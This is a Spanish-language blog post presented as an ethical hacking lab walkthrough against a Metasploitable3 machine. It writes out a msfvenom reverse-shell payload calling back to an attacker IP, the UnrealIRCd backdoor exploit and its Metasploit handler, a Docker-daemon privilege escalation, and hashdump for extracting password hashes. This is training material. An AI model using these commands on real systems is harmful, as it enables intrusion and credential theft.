💻"Cómo Conseguir Escalar Privilegios: Guía Paso a Paso" 🔐
- Sergio Almagre
- 13 feb
- 2 Min. de lectura
Actualizado: 15 feb

Ayer hablábamos un poco sobre la shell reversa y hoy os voy a mostrar una práctica sencilla sobre la La post-explotación, que como podéis intuir, es una fase esencial del hacking ético. En este post, detallo los pasos clave para realizar un ataque de escalada de privilegios.
1️⃣ Preparación del entorno
Inicia Kali Linux y la máquina vulnerable (Metasploitable3 Ubuntu) en la misma red.
Configura un payload con msfvenom:
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.50.100.4 LPORT=4444 > payload.py
2️⃣ Uso del exploit UnrealIRCd
Descarga el exploit de la siguiente ruta:
3️⃣ Modificación del exploit
Abre el archivo exploit.py con un editor:
emacs exploit.py
Inserta el payload generado previamente, asegurándote de mantener la sintaxis de Python (escapando caracteres).
4️⃣ Ejecuta el exploit
Configura el manejador en Metasploit:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 10.50.100.4
exploit
Lanza el exploit desde otra terminal:
./exploit.py 10.50.100.8 6667 -payload python
Resultado: Acceso a una shell Meterpreter en la máquina objetivo.
5️⃣ Aumentar privilegios
Envía la sesión a segundo plano:
background
sessions -l
Busca exploits disponibles:
search Docker_daemon
Configura el exploit y payload para escalada:
set payload linux/x86/meterpreter/reverse_tcp
exploit
Comprueba los nuevos privilegios obtenidos.
🔎 Ejecutando módulos de Metasploit
Con la sesión activa, utiliza módulos para extraer información relevante. Algunos ejemplos:
hashdump: Recupera hashes de contraseñas.
enum_network: Detalla configuraciones de red.
enum_logged_in_users: Muestra usuarios conectados.
🛡️ Reflexión final
Este ejercicio demuestra cómo pequeñas vulnerabilidades pueden permitir accesos críticos. La importancia de mantener sistemas actualizados y bien configurados es clave para prevenir ataques.
Curiosidad: UnrealIRCd es un caso clásico de backdoor introducido en código fuente público, demostrando que incluso software confiable puede ser comprometido.
💬 ¿Qué opinas de estas técnicas? ¿Ya las conocías? Comparte tus experiencias. 🚀
hashtag#Ciberseguridad hashtag#EscaladaDePrivilegios hashtag#Metasploit hashtag#HackingÉtico hashtag#PostExplotación
Comments